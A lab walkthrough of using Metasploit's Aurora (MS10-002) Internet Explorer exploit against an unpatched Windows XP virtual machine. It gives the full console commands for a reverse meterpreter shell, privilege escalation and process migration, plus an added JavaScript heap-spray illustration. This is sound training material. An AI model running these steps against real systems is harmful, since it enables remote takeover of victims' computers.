
Metasploit Meterpreter: Internet Explorer “Aurora” Memory Corruption Client-Side Exploit


I’m following the instructions given in Metasploit: The Penetration Tester’s Guide, Chapter 8 (Exploitation Using Client-Side Attacks).

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched), which ships with Internet Explorer 6, the only version this module reliably exploits. The firewall and automatic updates are switched off, Microsoft Internet Information Services (IIS) and the FTP service are enabled, SQL Server 2005 Express is configured, and a vulnerable web app is up and running.

Metasploit describes this module as follows:

This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the “Operation Aurora” attacks that led to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.

This is my first client-side exploit and I must say I rather enjoyed it.

First, to Metasploit to set up the exploit:

msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.1.70 <-- this is my IP (the attacking machine)
LHOST => 192.168.1.70
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > exploit -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.70:443
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.70:80/
[*] Server started.

Then I opened Internet Explorer on the target Windows system and entered the IP of the attacking machine in the browser.

At the same time I opened the Task Manager and watched the memory usage for iexplore.exe jump from 3,000-5,000K to over 300,000K as the exploit filled the heap.
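That jump is the heap spray at work: before triggering the bug, the exploit page allocates many identical blocks of "sled + payload" so that whatever address the corrupted pointer ends up at falls inside a sled and slides into the payload. The JavaScript below is an added illustration of that arithmetic, written for this edit; it is not code from the page or from the Metasploit module, and its block size (512 KiB), assumed heap base (0x00400000), target address (0x0c0c0c0c) and placeholder payload string are all assumptions chosen for illustration.

```javascript
// Added example (not from the page or the Metasploit module): the sizing behind a
// heap spray, which is why iexplore.exe balloons before the crash. Every size,
// address and the "payload" here is an assumption for illustration only.

// JavaScript strings are UTF-16, two bytes per code unit. A sled unit of "\u0c0c"
// lays down the bytes 0c 0c, so a sled of them is also the classic 0x0c0c0c0c pattern.
const SLED_UNIT = "\u0c0c";
const BLOCK_BYTES = 0x80000;                        // assumed: 512 KiB per spray block
const ASSUMED_HEAP_BASE = 0x00400000;               // assumed start of the sprayed region
const TARGET_ADDR = 0x0c0c0c0c;                     // address execution is redirected to
const PAYLOAD = "PAYLOAD-PLACEHOLDER".repeat(10);   // constructed stand-in for shellcode (190 units)

// Build one spray block of exactly blockBytes bytes: sled first, payload last.
function buildBlock(blockBytes, sledUnit, payload) {
  const units = blockBytes / 2;
  if (!Number.isInteger(units) || payload.length >= units) {
    throw new Error("block must be an even byte count larger than the payload");
  }
  return sledUnit.repeat(units - payload.length) + payload;
}

// How many blocks must be sprayed from heapBase so that targetAddr is covered,
// and where inside the covering block the target lands.
function sprayPlan(heapBase, targetAddr, blockBytes) {
  if (targetAddr < heapBase) throw new Error("target lies below the sprayed region");
  const offset = targetAddr - heapBase;
  const blockIndex = Math.floor(offset / blockBytes);
  return {
    blocks: blockIndex + 1,
    totalBytes: (blockIndex + 1) * blockBytes,
    blockIndex,
    offsetInBlockBytes: offset - blockIndex * blockBytes,
  };
}

// Classify an address at byteOffset into a block: "sled" means execution slides
// safely into the payload; "payload" means it starts mid-payload and usually crashes.
function landing(block, payloadLen, byteOffset) {
  const unit = Math.floor(byteOffset / 2);
  if (unit >= block.length) throw new Error("offset outside the block");
  return unit < block.length - payloadLen ? "sled" : "payload";
}

// Fraction of the sprayed region that is sled. A bigger payload shrinks the margin.
function sledCoverage(blockBytes, payloadLen) {
  const units = blockBytes / 2;
  return (units - payloadLen) / units;
}

// Walk through the assumed numbers. Nominal size = blocks * block bytes; whether a
// given engine really materialises distinct copies is engine-specific (IE6-era
// JScript copied on every concatenation, which is what Task Manager showed).
const block = buildBlock(BLOCK_BYTES, SLED_UNIT, PAYLOAD);
const plan = sprayPlan(ASSUMED_HEAP_BASE, TARGET_ADDR, BLOCK_BYTES);
console.log(`blocks needed: ${plan.blocks}, nominal spray size: ${Math.round(plan.totalBytes / 1024)} K`);
console.log(`0x${TARGET_ADDR.toString(16)} lands in the ${landing(block, PAYLOAD.length, plan.offsetInBlockBytes)}`);
console.log(`sled coverage: ${(100 * sledCoverage(BLOCK_BYTES, PAYLOAD.length)).toFixed(3)} %`);
```

With these assumed sizes the spray comes to a few hundred 512 KiB blocks, a nominal footprint in the same order as the ~300,000K the Task Manager reported, and the target address lands in a sled rather than in the payload. That is the trade-off a spray author manages: enough blocks to reach the chosen address, and a payload small enough relative to the sled that a slightly different landing point still works.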

Back to the attacking machine and Metasploit:

msf exploit(ms10_002_aurora) > [*] 192.168.1.79 ms10_002_aurora - Sending Internet Explorer “Aurora” Memory Corruption
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1115) at 2013-07-19 14:53:29 +0100

msf exploit(ms10_002_aurora) >

I then wanted a Meterpreter shell:

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1…

meterpreter >

I took a screenshot of the victim machine:

meterpreter > screenshot

[Screenshot of the victim desktop: aurora]

I then wanted to escalate my privileges:

meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

I thought I’d best migrate the process in case Explorer was shut down:

meterpreter > run post/windows/manage/migrate

[*] Running module against LAB
[*] Current server process: IEXPLORE.EXE (3156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2720
[+] Successfully migrated to process 2720
meterpreter >

Job done and good fun.
